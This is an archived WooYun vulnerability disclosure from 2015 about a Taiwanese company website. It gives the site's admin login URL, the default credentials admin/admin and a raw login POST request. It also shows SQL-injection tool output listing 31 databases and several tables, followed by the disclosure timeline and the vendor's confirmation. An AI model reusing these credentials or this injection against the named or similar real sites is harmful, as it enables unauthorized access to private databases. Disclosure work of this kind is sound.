乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-25: 细节已通知厂商并且等待厂商处理中 2015-08-27: 厂商已经确认,细节仅向厂商公开 2015-09-06: 细节向核心白帽子及相关领域专家公开 2015-09-16: 细节向普通白帽子公开 2015-09-26: 细节向实习白帽子公开 2015-10-11: 细节向公众公开
嚯嚯嚯-
http://www.nid.com.tw/nid/ASP/login.asp?logout=Y
ADMIN/admin
www.nid.com.tw
POST /nid/ASP/2k_chkpwd.asp HTTP/1.1Host: www.nid.com.twContent-Length: 36Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://www.nid.com.twUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.107 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://www.nid.com.tw/nid/ASP/login.ASP?idle=YAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: ASPSESSIONIDCSDRASRS=DOJFFEOBDMEOCHAGFGKPEFNIEMPID=admin&PW=admin&go.x=56&go.y=13
available databases [31]:[*] 20120903[*] 2marry[*] 2narry[*] [rbva-roc][*] carpenter[*] cookery[*] customer[*] electr[*] fop[*] hottaiwan[*] longder[*] love[*] master[*] model[*] msdb[*] nationwideunion[*] nid[*] ntpu[*] sales[*] salico[*] sanyinggas[*] taipeibeauty[*] TASTE[*] tempdb[*] Test[*] tradeunion[*] TRETSA[*] unionet[*] unionet3c[*] unions[*] yesall
ption '--threads' for faster data retrieval[11:46:17] [INFO] retrieved:[11:46:17] [INFO] heuristics detected web page charset 'ascii'66[11:46:19] [INFO] retrieved: dbo.accounts[11:46:43] [INFO] retrieved: dbo.apy_d[11:46:55] [INFO] retrieved: dbo.apy_m[11:47:02] [INFO] retrieved: dbo.att_d[11:47:14] [INFO] retrieved: dbo.atten
不跑了,,点到为止
危害等级:高
漏洞Rank:18
确认时间:2015-08-27 12:16
感謝通知!
暂无